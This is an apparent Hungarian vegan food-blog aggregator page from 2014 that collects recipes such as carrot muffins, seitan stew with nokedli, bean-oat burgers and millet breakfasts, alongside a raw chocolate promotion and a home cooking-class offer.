2014. március 16. Zizi kalandjai
Ádi első szilárd étele a répa volt. Ezt ette két héten keresztül és igen szerette. Mivel minden héten vásárolunk a piacon továbbra is répát, hogy biztos legyen itthon, néhány hete már nagyon fel volt halmozódva, mert nyilván Ádi és mi se ettük a répát répával. Így gyorsan felhasználtam a régi darabokat, hogy legyen a frissnek hely. Készült belőle frissen facsart répalé, amelyet céklával és almával turbóztunk fel és még Ádinak is ízlett nagyon. És végre sütöttem, ezeket a répás muffinokat. Kókusztejjel és kókuszvirág cukorral dobtam fel, pikk-pakk összedobható és gyorsan meg is sül.
A kókuszvirág cukor a kókuszpálma virágjának nektárjából készült cukorkülönlegesség. Íze számomra karamellás, nagyon finom magában is. Alacsony a fruktóz tartalma, kb. 1-2% és alacsony a glikémiás indexe is, ami 35. A legtöbb kókuszpálma ültetvény Indonéziában és a Fülöp-szigeteken található, ezeknek egy részén bio gazdálkodás folyik. Nagyon sok vitamin és ásványi anyag található benne; a legtöbb cukorral, édesítőszerrel ellentétben a kókuszvirág cukor nem csak sima szénhidrát. Nagy mennyiségben található benne C-vitamin, kálcium, foszfor, kálium, vas, cink, magnézium, mangán és réz. Nem keverendő össze a pálmacukorral, mely bizonyos pálmák fájának és nem az értékes virágnak a nedvéből készülnek.
Apropó sütés… ugye, amikor a gyorsaságon van a hangsúly, akkor általában csak a főzésre koncentrálok, a sütés egyelőre luxusszámba megy. Most már tudok valamennyire előkészülni Ádi mellett, de egy teljes folyamatot nem tudok végigvinni, mindig kell szünetet tartanom. Szóval elszoktam a sütéstől és erre a legjobb bizonyíték, hogy tegnap délután összeállítottam egy vegán mandulás földimogyorókeksz tésztát, aztán este fektetés után beraktam a sütőbe. Úgy érzékeltem, hogy kb. 20 perce lehettek bent (ez nekem nem tűnt soknak, úgy emlékeztem, hogy korábban is 15-20 percig sütöttem kekszeket 170-180 fokon), amikor éreztem az illatot… nagyon sült illatot. Kiveszem a sütőből és feketére voltak égve. Kuka! Sajnáltam, mert nagyon kívántam már, hogy végre valami általam sütött nasit egyek este, amikor nincs energiám semmire, csak kidőlök a kanapén és Szex és New York jeleneteket nézek YouTube-on (az egyik kedvencem). Maradt a csoki kocka, de jövő héten újra megsütöm és hozom a receptet nektek!
Vegán kókuszos répa muffin
Hozzávalók 12 db-hoz:
- 1 bögre zabliszt
- 3/4 bögre tönköly fehérliszt
- 1 és 1/2 bögre reszelt répa
- 1 evőkanál őrölt lenmag
- 3 evőkanál víz
- 1/4 bögre kókuszvirág cukor
- 1/3 bögre almaszósz
- 1/4 bögre kókuszolaj (olvasztott, folyékony állapotban)
- 1 teáskanál sütőpor
- 1/2 teáskanál szódabikarbóna
- 1/2 teáskanál só
- 1-2 teáskanál fahéj (ízlés szerint)
- 1/2 bögre kókusztej (mandula-, rizs-, zab és szójatej is használható)
- 1 vaníliarúd kikapart magjai
(A recepthez használt bögre 250 ml-es.)
Egy tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni néhány percig, amíg kocsonyás állagú lesz. Melegítsük elő a sütőt 175 fokra. Béleljük ki a muffintepsit papírkapszlikkal.
Egy tálban keverjük össze a száraz hozzávalókat: lisztek, sütőpor, szódabikarbóna, só, fahéj. Egy másik tálban keverjük össze a nedves hozzávalókat: almaszósz, kókusztej, kókuszolaj, kókuszvirág cukor, lenmag keverék, majd jöhet a reszelt répa. A nedves hozzávalókat öntsük a szárazhoz és jól keverjük el.
Kanállal osszuk el a tésztát egyenlő részben a muffinformákban. Süssük 175 fokon kb. 25-30 percig, amíg aranybarnák lesznek. Kivétel előtt azért végezzünk tűpróbát, hogy jól átsültek-e a muffinok.
Tipp: a liszteket tekintve lehet variálni. Zabliszt helyett lehet köleslisztet vagy akár hajdinalisztet használni; a tönköly fehérliszt helyett pedig simalisztet vagy teljeskiörlésű lisztet. Az almaszószhoz az almát meghámoztam, kimagoztam és egyszerű baba almareszelőn pépesítettem. Ha nincs ilyen reszelőnk, akkor kiválthatjuk egyszerű DM-ben, Rossmannban kapható bio bébi almapürével.
Fotóbomba… egy Ádi kéz betámad
Vegalife-tól Vegalife-nak
Újabb Vegalife.hu ételt próbáltam ki. Tudomásom szerint vegán étel volt, mégpedig
Kínai sült rizs édes káposzta salátával .
Kínai ételt már meglehetősen sokszor ettem, leginkább kínai éttermekben. Noha annyira nem vagyok oda a kínai "gyorskajákért", amikor mégis erre vetemedek, az leginkább azért van, mert az egész napos rohanás közben nem jutok haza, hogy egyek, a sok intézni való mellett pedig igazából örülök, ha van egy hely, ahol "kiszolgálnak", értem azt, megfőznek és elmosogatnak. Persze, ha csak lehet kerülöm ezt a megoldást.
Ezek után persze érdeklődve vártam, milyen lesz a vegalife-os kínai sült rizs. Valami speciális fűszerrel ízesítették. Kicsit olyan érzésem volt, mintha mézeskalács fűszerkeverék lett volna benne, de az is elképzelhető, hogy fahéj esetleg ánizs volt a rendhagyó fűszer?? Így annak ellenére hogy a szójaszósszal készült ételeket kevésbé kedvelem a kínai sült rizs finomra sikerült.
A káposzta saláta alapja lila káposzta volt, de volt benne paradicsom és ami az érdekes, egyedi ízét adta, az a fekete olívabogyó. Ezenkívül biztos volt még más fűszer is rajta. Summa summarum a káposztasaláta is ízlett.
A sült rizs felét férjem ette meg. 4,5 pontot ért ez az étel számomra. (Lesz még maximum pontos:) )
Diós - banános hajdinamuffin
Nincs mit szépíteni, ez a süti 100% hajdinaliszttel (úgy lesz gluténmentes!) nem volt egy világszám (én sehogy sem tudom megszokni a hajdina jellegzetes mellék-/ utóízét:/) Miután azonban a megadott liszt menyiségét lecseréltem félig teljes kiőrlésű tönkölylisztre, mmmmm...:) Egy cukormentes, alig édes reggeli, vagy uzsonna-süti, ami viszont egy jó kis gabonakávés-szójatejes cappuccinoval üdítően hat!;) És gyorsan elkészül, akár vasárnap reggel is!:) Diós - banános hajdinamuffin Elkészítési idő: kb. 25 perc Hozzávalók (9 db muffinhoz): 2 banán (kb. 200 g meghámozva), felaprítva 50 g dió, durvára vágva 200 g hajdinaliszt, de nálam ez volt fele teljes kiőrlésű tönkölyliszt! tengeri só 1 tk. őrölt fahéj 170 ml zabtej (ha tönkölyliszttel készíted, az több folyadékot vesz fel kicsivel!) 50 g (kókusz)olaj 55 g rizsszirup/ agave szirup 2 tk. foszfátmentes borkő sütőpor (pl. DM-ben is kapható!) Melegítsük elő a sütőt 180 fokra, légkeverésre. Egy nagy tálban keverjük össze a hozzávalókat, utoljára adjuk hozzá a banánt és a diót. Papírkapszlikkal kibélelt muffinformába kanalazzuk a tésztát, és a sütő középső sínjén kb. 15-17 percig sütjük. Fogpiszkálóval a közepébe szúrva ellenőrizzük, kisült-e. Fogyasztás előtt hagyjuk kicist kihűlni. Forrás: Attila Hildmann: Vegan for Youth
Nyers kakaó és csokoládé mániaaaa
Először is egy vallomással tartozom. Én sohasem voltam nagy kakaó rajongó. A tejcsokoládék mindig túl édesek voltak nekem (pedig édes szájú vagyok!), az étcsokoládétól megfájdult a fejem, a forró csokit pedig nehezem emésztettem. Ez még mind igaz most is, csak ma már nem eszek akármilyen csokoládét és kakaót. Évekkel ezelőtt, mikor elkezdtem komolyabban foglalkozni a nyers étrenddel, hallottam, hogy létezik nyers kakaó is. Akkor nem is gondoltam, hogy ez valaha engem is érdekelhet. EGÉSZSÉG?Sok érv és ellenérv van a kakaóval kapcsolatban. Van, aki egyáltalán nem fogyasztja, hanem karobporral helyettesíti az étrendjében. Viszont sok kakaórajongó szerint sok pozitív hatása is van. A kakaó magas antioxidánstartalma védi a sejteket, így lassítja az öregedési folyamatokat. Magas magnéziumtartalma segíti az idegi és serkenti az izomműködést. Nyomelemekben és ásványi anyagokban is nagyon gazdag. Serkenti a vérkeringést, véralvadásgátló, segít csökkenteni a vérnyomást, hangulatjavító, energetizáló. - Kakaóbab töret, kakaópor, a friss kakaóbab termés és kakaómassza. - NYERS.Mint tudjuk, a hőkezelés károsítja az ételek, alapanyagok "értékeit". A kakaó ipari feldolgozásánál 100-140°C-on pörkölik a kakaót, így joggal kérdezhetjük, hogy mi marad a kakaóbabban ennek a feldolgozási folyamatnak a végére? Itt jön képbe a nyers kakaó fogalma. A nyers kakaót nagyon ellenőrzött körülmények között, lassan fermentálják (erjesztik) sajtát nedvességében, majd maximum 42°C-on szárítják, így jobban megőrzi kiváló tápanyagtartalmát. MINŐSÉG.A főiskolán Táplálkozástan órán, mint élvezeti szerről tanultunk a kakaóról és a csokoládéról. De ahogy már írtam, csokoládé és csokoládé között is nagy különbség lehet. Tévedünk azonban, hogyha azt hisszük, hogy csak a csokoládékban levő kakaótartalom befolyásolja a minőséget. A kakaó fajtája, a terület, ahonnan származik és a feldolgozásának módját is figyelembe kell vennünk, ha minőségi csokoládét keresünk. A nyers kakaóból készült termékeknél a fermentálás is kulcsfontosságú folyamat, a jó ízű kakaóbab elérése érdekében. EGY ALTERNATÍVA. Fibonacci Aktív Kakaó CsokoládéKézzel készített, Nyers vegán, 80% kakaótartalmú (a legfinomabb criollo fajtából), 80g táblás csokoládé. Összetevők: nyers kakaó massza, nyers kakaó vaj, nyers agave. Ebben a nagyszerű ízű és textúrájú csokoládéban megtalálható a nyers kakaó minden aktív tulajdonsága. Vásárold meg a Fibonacci nyers csokoládét vagy más nyers kakaó termékeket webáruházunkban!
Csokis-mogyorós torta percek alatt (vegán)
Ez a csokis-mogyorós torta hihetetlenül gyorsan elkészíthető. Mikróban 5 perc alatt megsül a tésztája, amit 1-2 perc alatt össze lehet állítani. A krémje mindenféle főzés nélkül szintén legfeljebb 10 perc alatt összeturmixolható (én aprítógéppel készítettem, de botturmix segítségével is lehet). Már csak egy kevés mogyorót kell hozzá darálni (aprító vagy kávédaráló alkalmas hozzá). Végül pedig a tortát széltében kettévágni, megkenni, díszíteni és kész is a gyors tortácska kevesebb, mint fél óra alatt.
A csokikrém receptje:
Hozzávalók:
- 1,5-2 db érett nagy avokádó
- 5 dkg kakaópor (kevesebb karobbal is készíthető!)
- 5 dkg kókuszolaj
- 10 dkg édesítőszer, pl: nádcukor, nyírfacukor, méz, stb, ki mit használ
- 1 csipet tengeri só
- 1/2 vanília kikapart belseje vagy 1 teáskanál vanília esszencia
Elkészítés:
Vegyük elő a turmixgépet és a fentieket mindet, ebben a sorrendben tegyük bele. Indítsuk el, és hamarosan látni fogjuk hogy milyen fantasztikus krémet kapunk végeredményne k. Olyan krémet, mint a csokitorták csokikrémje. Ha lágyabb krémet szeretnénk, pár csepp vízzel vagy növényi tejjel krémesebb lesz. A kész krémet kb. 1/2 órára érdemes hűtőbe tenni, megdermedés után jobban használható. Amíg dermed a krém, van időnk elkészíteni a torta tésztáját mikróban az alapján, ahogy az előző receptemben leírtam.
Biztonság kedvéért ide is bemásolom:
A torta receptje:
Hozzávalók:
7 evőkanál liszt
3 evőkanál teljes kiőrlésű liszt
3 evőkanál nyírfacukor
14 evőkanál növényi tej (én növényi tejporból készítettem)
2 evőkanál étolaj
1/2 teáskanál szódabikarbóna
1 műanyag tál (nálam ételhordó doboza volt)
Elkészítés:
Választunk egy hőálló műanyag edényt, amiben sütni fogjuk a piskótánkat. Én egy kerek ételhordó dobozt választottam. Összekeverjük benne először a száraz hozzávalókat, majd hozzákanalazzuk a növényi tejet és étolajat. Jól összekeverjük az egészet, majd mehet is a mikróba. Legnagyobb fokozaton 5 perc alatt elkészül a piskóta. Nem kell lefedni mikrózáshoz a tésztát, had "szellőzzön". Gyengébb mikróknál elképzelhető, hogy 5 és fél - 6 perc szükséges.
Összeállítás:
Hozzávalók:
- Az elkészített csokikrém
- A megsütött torta
- Darált mogyoró (kb. 10-15 dkg)
A megsült tortát egy nagy késsel széltében kettévágjuk. A csokikrém egy részét az alsó tortakarikára kenjük, majd megszórjuk darált mogyoróval és ráhelyezzük a torta felső részét. A felső részt és a torta oldalát is megkenjük a csokikrémmel, megszórjuk darált mogyoróval oldalt is, majd ízlés és lehetőség szerint még díszítjük. Gyorsan kész kellett, hogy legyen, így egyszerűen csak egész mogyorószemekkel díszítettem. Finom lett, gyorsan el is fogyott.
Vegán vörösboros "marha" nokedlivel
Ez a recept neked szól, ha vegán vagy, de szereted a klasszikus magyar konyha ízvilágát. Akkor is, ha a pasid/csajod/barátaid/rokonaid nem azok, és szeretnéd őket elkápráztatni egy tradicionális, de minden részletében vegán kajával. Akkor is, ha nem vagy vegán, de nem szeretnél több ezer forintot a hentesnél hagyni, és 4-5 órát a tűzhely mellett ácsorogni. Peace, love, ízorgia és no koleszterin. Ez a vegán vörösboros ,,marha nokedlivel.
Hozzávalók:
A pörkölt:
- 600g szejtán nagyobb, szabálytalan, falatnyi darabokra vágva
- 4-5 db közepes méretű vöröshagyma apróra vágva
- 4 gerezd fokhagyma zúzva
- 2db paprika apróra vágva (felgyorsíthatjuk a szaftképződést, ha a paprikát és a paradicsomot leturmixolva adjuk az ételhez)
- 2db paradicsom apróra vágva
- 0,5-0,75 dl jó minőségű házi száraz vörösbor
- 6 ek növényi olaj - a mennyiség szükség szerint növelhető (pl.: napraforgó, olíva stb.)
- 2 csapott ek őrölt fűszerpaprika (édes)
- 1,5 tk őrölt fekete bors
- 1,5 tk őrölt kömény
- 2 tk só
A nokedli:
- 300g BL55 finomliszt
- 100g csicseriborsóliszt (ez teszi kissé sárgássá a tésztát)
- kb. 3,25 dl víz
- ízlés szerint fekete só (ez ad neki enyhén tojásos ízhatást)
Nyers nokedli tészta, fekete sóval
Így készítsd el:
- Egy nagyobb lábasban, olajon párold üvegesre a vöröshagymát, majd öntsd rá a felkockázott szejtánt, és pirítsd meg egy kicsit.
- Húzd félre a tűzről az edényt és öntsd az alaphoz a zúzott fokhagymát, a paprikát, a borsot, köményt, a sót és keverd át, majd önts hozzá annyi vizet, hogy ellepje. (Fontos, hogy kóstold főzés közben az ételt és ha szükséges fűszerezd tovább.)
- Közepes lángon forrald fel a pörköltöt, majd keverd hozzá a paprikát és paradicsomot. Lassú tűzön, néha átkeverve főzd kb. 30-40 percig, amíg a zöldségek teljesen szétfőnek és pörkölt szaftja besűrűsödik, megül a szejtánon (megtapad rajta, nem folyik le). (A vizet időnként pótolni kell, hogy le ne égjen az étel, és legyen elég szaftja.) A főzés utolsó percében keverd hozzá a vörösbort.
- Amíg a pörkölt rotyog, készítsd el a nokedlit. Egy tálban keverd össze a finomlisztet, a csicseriborsólisztet és a fekete sót (ne sózd túl a nokedlit, mert a pörkölt ízét módosítani fogja).
- Keverj hozzá annyi vizet, amennyitől sűrű, folyós állagú tészta lesz kb. 3,25dl. Nem kell simára keverni a nokedlitésztát, csak az a lényeg, hogy ne maradjon száraz liszt a tálban.
- Egy lábasban forralj vizet. A víz fölé helyezett nokedliszaggatóba öntsd bele a tésztát, majd vízszintes mozdulatokkal szaggasd a lobogó vízbe.
- Várd meg, amíg a nokedli feljön a víz tetejére, ezután szűrd le, mosd át folyóvízzel, majd lecsepegtetve tedd félre tálalásig. (Az a legjobb, ha a pörkölttel egy időben készül el.)
- Az elkészült nokedlit halmozd a tányérok közepére a pörkölt mellé. Adj hozzá néhány szem savanyú uborkát. Az ételt díszítésképpen apróra vágott petrezselyemmel is megszórhatod.
Vegán bab-zab burger
2014. március 3. Zizi kalandjai
Néhány hete feltettem a kérdést a Facebook oldalon, hogy hol lehet Budapesten vagy vidéken jó vega burgert enni. Jöttek a válaszok – néhányan halasat is ajánlottatok, noha, aki halat eszik, az nem vega -, de kiderült, hogy az esetek többségében itthon a vegetáriánus hamburger kimerül a sajtos vagy gombás verzióban. És tényleg… van jó grillezett kecskesajtos burger, de jó lenne, ha egy étterem kínálna többféle vega burgert… például édesburgonyából vagy sütőtökből vagy padlizsánból, esetleg quinoaból készültet. Igazából végtelen a lehetőségek száma… egy kis fantázia és máris kész a szaftos vega hamburger. Nyamm!
Fotó: Boook Kiadó
Anna bab-zab burgerét már kóstoltam az egyik Restaurant Day-en és nagyon ízlett. Ropogós zsemlében hagyma chutney-val és házi ketchuppal tálalva igazi gourmet fogás. Már régóta terveztem, hogy elkészítem és amikor megvettem Anna szakácskönyvét, akkor az elsők között elkészítendő receptek kategóriájába soroltam. Aztán váratott magára az elkészítés, de, ami késik, az nem mindig a busz (ahogy Áron barátom mondaná ).
(Annával készült interjúmat itt olvashatjátok.)
Csodás hagymakarikák egy szuper éles késnek köszönhetően
Néhány nappal ezelőtt aztán végre belevágtam. Igazából a recept illeszkedik a hétköznapi gyors vacsorák és az anyabarát kategóriába, ugyanis a tésztáját össze lehet állítani, akár előző nap is és másnap mondjuk ebédre vagy vacsorára elkészíteni. A kisült fasírtokat aztán le is lehet fagyasztani, és ha kevés az időnk, kiveszünk néhány darabot a fagyasztóból, teflonserpenyőben átmelegítjük/átpirítjuk és már tálalhatjuk is zsemlében vagy salátával, de akár burgonyapürével is. Baba- és gyerekbarát recept is egyben, talán a fűszerezésnél visszafogom majd kicsit magam, de valószínűleg ez lesz Ádi első hamburger pogácsája, amit ki fog próbálni.
Vegán bab-zab burger
Hozzávalók (mérettől függően 12-20 db-hoz):
- 125 g zabpehely, langyos, sós vízbe áztatva 30 percre
- 1 konzerv bab, lecsöpögtetve, pürésítve (villával vagy robotgépben)
- 80-100 g zsemlemorzsa
- 1 fej vöröshagyma, felaprítva
- 3 gerezd fokhagyma, felaprítva
- 1 közepes répa, felaprítva
- 1/2 zeller (közepes méret), felaprítva
- néhány szál petrezselyem, felaprítva
- 1 evőkanál citromlé
- 2 teáskanál Dijon mustár
- 1 teáskanál oregánó
- só, bors
- napraforgóolaj és olívaolaj
- tálaláshoz: saláta, mustár, ketchup, lilahagyma karikák, hagyma chutney, csírák, hamburger zsemle vagy ciabatta
A beáztatott zabpelyhet szitán csöpögtessük át és nyomkodjuk is ki belőle a felesleges vizet. Én robotgépben aprítottam fel egyszerre a vöröshagymát, fokhagymát, répát és zellert, így elég sok időt megspóroltam.
Egy serpenyőben hevítsünk 2 evőkanál olívaolajat és a felaprított vöröshagymát, répát, zellert, majd 2-3 perc múlva a fokhagymát is hozzáadva dinszteljük meg a zöldségeket egy csipet sóval. Zárjuk el alatta a gázt és hagyjuk kihűlni.
Egy tálban keverjük össze a zabpelyhet, a babbal, a megdinsztelt zöldségekkel, petrezselyemmel, ízesítsük citromlével, mustárral, oregánóval, sóval és borssal. Adjuk hozzá a zsemlemorzsát, és gyúrjuk össze, amíg formázható “tésztát” nem kapunk.
Pingponglabda nagyságú golyókat formázzunk belőle, tenyerünkkel lapítsuk le és egy kevés napraforgó olajban süssük ki a fasírtokat. Tálaljuk hamburger zsemlében/ciabattában, zöldségekkel, ketchuppal, mustárral.
Gombával töltött tönkölypalacsinta
Már napok óta palacsintára vágytam, végre meg is sütöttem Lett belőle mindenféle, sós is, édes is, de mivel a saját őrlésű tönkölybúzámból készült, rendkívül laktató, egyszerre csak egyet lehet megenni belőle Hozzávalók a palacsintához: 3 ek tönkölyliszt 2 ek sima liszt 1 csipet szódabikarbóna 1 csipet tiszta só 1/2 dl friss, házi tej 1 dl […]
Krémes polenta pirított balzsamecetes kelbimbóval
2014. február 28. Zizi kalandjai
Pár hónapja kért fel a Wannabe Chef egyik szerzője, Orsi, hogy legyek vendég a blogjukon, amikor ő éppen babázni fog második kisfiával. Orsi kisfia ebben a hónapban született, így most kevesebb ideje marad a blogra. Természetesen elvállaltam, mert engem is sokan kisegítettek, amikor a szoptatás, pelenkacsere, büfiztetés édeshármas bűvkörében éltem.
A receptben a polenta a köret, a kelbimbó pedig a feltét. Ez egy lakto vegetáriánus étel, de lehet vegánosítani, ha a vaj helyett jó minőségű margarint használunk, a parmezán vagy pecorino helyett pedig növényi sajtot. Gyors hétköznapi vacsoraként vagy anyabarát hétköznapi ebédként is megállja a helyét, mert, amíg a kelbimbó sül a sütőben, addig elkészíthetjük a polentát. Előkészületekkel együtt 30 perc alatt megvan. A receptet és a velem készült interjút itt találjátok.
Aki pedig valami hasonló finomságra vágyik, az jöjjön el március 2-án vasárnap a Szimpla Háztáji Piacra, ugyanis a Felelős Gasztrohős felkérésének köszönhetően főzni fogok egy lakto vegetáriánus (lesz vegán változat is!) szezonális zöldségragut polentával. Rajtam kívül Rita, a Rita Konyhája blog szerzője és egyben a Köles ételbár egyik tulajdonosa fog egy gluténmentes húsos céklalevest főzni.
A Felelős Gasztrohős csapata non profit szervezetként egyelőre elsősorban támogatások és pályázatok útján tehet szert a működésük finanszírozására. A Szimpla Háztáji Piac a helyszín és az eszközök biztosításával támogatja a főzést. Ha nektek is tetszik, amivel a gasztrohősök foglalkoznak, és szeretnétek, hogy még sokáig dolgozhassanak a környezetbarát és egészséges táplálkozás elterjedéséért, akkor gyertek el és egyetek egy jót! Az ebéd becsületkasszás, az így befolyt összeget a megállapodás szerint a további működésükre fordítják.
Trópusi reggeli
Az ananászt Kolombusz második útján, 1493-ban látta meg Guadeloupe szigetén (igen, oda nagyon szeretnék elmenni!), és hozta magával Európába, ahol az óriás fenyőtobozra hasonlító gyümölcs (a pineapple angol szó is erre utal) csodálatot keltett. Nehéz szállíthatósága azonban ritka és drága kinccsé tette, ezért vált a jólét, a gazdagság, a fényűzés szimbólumává, egyszersmind a vendéglátás és a vendégszeretet jelképévé. Napjainkra Thaiföld és Fülöp-szigetek vált az ananásztermelés központjává, de jelentős India, Kína és némely afrikai ország, pl. Elelfántcsontpart és Kenya. Hazánkban a 19. századra terjedt el, mégpedig az Esterházy család kismartoni kastélyának üvegházában nevelték az ananászokat. Az 1800-as években már 400 db ananászt is szüreteltek.
Szép ananászhoz és mangóhoz jutottunk, egy kis növényi tejben megfőtt kölessel valami fenséges hawaii reggelit varázsoltam.
A recept:
Hozzávalók:
- 15 dkg köles
- 1,5 dl növényi tej
- 1/2 ananász
- 1/2 mangó
- egy kevés vanília kikaparva, vagy vanília-aroma, esetleg vaníliás cukor
- 1 evőkanál biocsicsóka sűrítmény
- kb. 1-2 evőkanál nyírfacukor (vagy ki mivel édesít...)
- 1/2 megmosott citrom lereszelt héja
Elkészítés:
A kölest kétszeres mennyiségű vízben megfőzzük. Amikor a víz elpárolgott, hozzáöntjük a növényi tejet. Míg fő, az ananászt és mangót elfelezzük, egyik felét megpucoljuk és felkockázzuk, a citrom héját lereszeljük. Vaníliával és a citrom lereszelt héjával, valamint nyírfacukorral és biocsicsóka sűrítménnyel ízesítjük a puhára főtt kölest. Az így elkészített kölest a felaprított ananásszal és mangóval tálaljuk. Csinos poharakba tettem. Egy sor mangó, egy kevés köles, majd jó sok gyümölcs és a tetejére a megfőtt kölesből egy gombócot formáltam, így szervíroztam. Nagyon finom ízélmény volt. Természetesen nem csak reggelinek, hanem desszertnek is elkészíthetjük.
Készítsünk együtt egészséges és gyors ételeket a saját otthonodban!
2014. február 24. Éltető ételek
Szívesen kipróbálnál egészséges, teljes értékű nyers és főtt ételeket, de nincs időd elmenni egy főzőtanfolyamra? Szívesen elhívnád barátnőidet, hogy együtt ismerkedjetek meg a finom és egészséges ételekkel? Érzed, hogy változtatni kellene, de nem tudod, hogy hogyan kezd el? KÉSZÍTSÜNK EGYÜTT nyers és főtt ételeket! Válassz a menüajánlat közül és már kezdhetjük is! Hívj fel, egyeztetünk időpontot, a többit intézem én: beszerzem a kiváló minőségű alapanyagokat, majd a megbeszélt időpontban becsengetek hozzád. Kb. 3 óra alatt közösen elkészítjük a kiválasztott ételeket, közben megismerkedhetsz az alapanyagokkal, beszerzési forrásokkal is. Ár: - 9000 Ft/fő (2 fő részvétele esetén) - 8000 Ft/fő (3 fő részvétele esetén) - 7000 Ft/fő (4 fő részvétele esetén) Mit tartalmaz az ár? - 3 órás, személyre szabott főzőtanfolyam a saját konyhádban - alapanyagok beszerzése és házhozszállítása - kinyomtatott receptfüzet - bevásárlótippek - a házigazdának egy "Éltető ételek" ajándékcsomag Kiszállási díj: - Tiszaújváros és 10 km-es vonzáskörzete: INGYENES - 10-30 km-es körzetben: 3.000 Ft - 30-50 km-es körzetben: 5.000 Ft Jelentkezz, és megbeszéljük a részleteket: 06-20/957-0511. Vagy írhatsz e-mailt: riczu.aniko73@gmail.com MENÜAJÁNLAT: 1. Egészséges reggeli, vacsora ötletek, Gluténmentes - Zöld turmix (nyers) - Kókuszos rizskása házilag készített mandulatejjel (főtt) - Narancsos rizspuding mazsolával és pirított mogyoróval (főtt) - Gyümölcsös hajdinakása (nyers) - Mandulás körtezselé hajdinacsírával (nyers) - Hajdinás amerikai palacsinta (főtt) 2. Egészséges reggeli, vacsora ötletek, Gluténmentes - Búzafű (nyers) - Kolláth reggeli (nyers) - Mazsolás kukorica-köleskása házilag készített mandulatejjel (főtt) - Datolyakrémmel töltött "túró" gombóc (főtt) - Téli fűszerezési smoothie (nyers) 3. Egészséges reggeli, vacsora ötletek, Gluténmentes - Egzotikus zöld turmix (nyers) - Hogyan csíráztassunk? - kóstoló (nyers) - Zöldséges Kolláth (nyers) - Zab az étlapon, kásák változatos elkészítéssel (főtt) - Gyümölcs"rizs" (nyers) 4. Egészséges reggeli, vacsora ötletek, Gluténmentes - Mandulás gyümölcs smoothie (nyers) - Müzli készítése házilag (nyers) - Mag és gabonatejek házilag (nyers) - Kenyérfeltétek (nyers és főtt) - Saláták ezer arca 5. Egészséges nasik, gluténmentes - Zserbó bon-bon - Ezerarcú csokikrém gyorsan - Müzligolyó - Mennyei datolyavajas praliné mogyorós csokival - Narancskrémmel töltött nyers muffin 6. Egészséges nasik, gluténmentes - Zserbó szelet - Brownie praliné - Pohárkrémek: gyorsan, valami fnomat - Gyümölcs"rizs" - Almakrémmel töltött nyers muffin 7. Egészséges nasik, gluténmentes - Kókuszos praliné - Müzli golyó - Mini aszaltszilvás csokitorta - Diókrém falatkák - Mákos "tészta" 8. Egészséges nasik, gluténmentes - Raffaello - Barackos tökpuding - Mini banános csokitorta karamell réteggel - Almás mákpuding - Kókuszos tekercs 9. Nyers menü készítés - Tyúkhúros zöld turmix - Édes, krémes körteleves - Székelykáposzta magtejföllel - Narancskrémmel töltött nyers muffin - Almatorta karamell öntettel 10. Nyers menü készítés - Gyömbéres-citromos mángold turmix - Narancsos sütőtök krémleves - Marinált zöldség fasírttal - Raffaello - Aszaltszilvás csokitorta
Banános hajdina palacsinta – Glutén,-tej,-tojásmentes
Vasárnap reggel, kissé álmosan, kint esik az eső és Viki palacsintát kér reggelire. Egy héten egyszer, hétvégén megérdemlünk reggel egy kis finomságot. A kamrámban van hetek óta egy csomag hajdina liszt, nem volt alkalmam semmire felhasználni, mivel az utóbbi időben az itthoni főzés – sütés teljesen visszaszorult.
A hajdina egy nagyon egészséges gabona, tulajdonképpen nemis gabona, hanem mag termés. Mégis mindenki idegenkedik tőle, sokan nem szeretik jellegzetes, karakteres íze miatt.
- Magas rutintartalma miatt őseink a hajdinát a magas vérnyomás kezelésére gyógynövényként használták. Rutin hatóanyagának köszönhetően erősíti a kötőszöveteket és az érrendszert – az erek kötőszövetes állományát – azáltal, hogy részt vesz a sejtfal regenerálódási folyamataiban. Gluténmentes és rendkívül magas a B vitamin család tartalma, rosttartalma.
- A hajdinából régebbi korokban leggyakrabban kását főztek. A legtöbben napjainkban is csak ebben a formában ismerik, pedig a hajdina ennél lényegesen sokoldalúbb.
A lisztjéből például ízletes palacsinta készíthető:
Hozzávalók: 6-8 db amerikai palacsinta
200 g hajdina liszt
3 evőkanál kukorica keményítő
400 ml víz vagy növényi tej
csipet szódabikarbóna
3 db banán
1 kk őrölt fahéj
kókusz olaj a sütéshez
A lisztet, kukorica keményítőt, szódabikarbonát elkeverjük vízzel, palacsinta vagy kerámia sütőben felhevítjük az olajat és kisebb palacsintákat sütünk ki. Amikor a tésztát adagoljuk a tetejére karikára vágott banán szeleteket teszünk amelyeket fahéjjal megszórunk. Majd megfordítjuk a palacsintát és a banános felét is megsütjük.
Én nem használtam semmilyen édesítést, nekünk bőven elég volt az érett banán cukortartalma, amely kissé karamelizálódott. Aki igényli kevés mézzel vagy agave sziruppal, rizssziruppal megcsorgathatja.
Almás-diós köles
Még az idei legelső főzőkör alkalmára készítettem el ezt a finomságot. Alma, dió, baracklekvár, köles együttessel valami fenséges reggelit vagy desszertet készíthetünk. Sütni sem kell, csak a kölest megfőzni. Ráadásul tele van tápanyagokkal, sőt az emésztőszerveinkre is jótékony hatással bír. A köles eleve prebiotikus hatású, vagyis részt vesz a jó baktériumok mennyiségi növelésében. Az alma pedig pektint tartalmaz. A pektin a vastagbélben található baktériumok számára tápanyag-forrásként szolgál (rövid láncú zsírsavakra bontják le, melyek hosszú távon csökkentik a koleszterinszintet, mert gátolják a koleszterin felszívódását . (Forrás: Wikipédia) Tehát bélrendszerünk számára hasznos táplálék.
A recept:
Hozzávalók:
- 20 dkg köles
- 1,5 dl növényi tej
- 2-3 alma
- 1 nagyobb marék dió
- egy kevés vanília kikaparva, vagy vanília-aroma, esetleg vaníliás cukor
- 1 evőkanál biocsicsóka sűrítmény
- kb. 1-2 evőkanál nyírfacukor (vagy ki mivel édesít...)
- 1 megmosott citrom lereszelt héja
- baracklekvár
Elkészítés:
A kölest kétszeres mennyiségű vízben megfőzzük. Amikor a víz elpárolgott, hozzáöntjük a növényi tejet. Míg fő, a diót megdaráljuk, az almákat és a citrom héját lereszeljük. Vaníliával és a citrom lereszelt héjával, valamint nyírfacukorral és biocsicsóka sűrítménnyel ízesítjük a puhára főtt kölest. Az így elkészített kölest két részre osztjuk. Az egyiket a darált dióval és némi nyírfacukorral ízesítjük, a másik adagot pedig a reszelt almával. Egy tálba lesimítjuk a diós kölest, megkenjük baracklekvárral, majd rásimítjuk a diós kölest. Ez a műveletet akár még egyszer elvégezhetjük.
Tálalásnál a szeletek tetejére egy-egy almakarikát tehetünk, aminek a közepében egy szem dió jól mutat. Finom, egészséges reggeli vagy vendégváró falat.
Biopiac & átvariált kelkáposzta főzelék
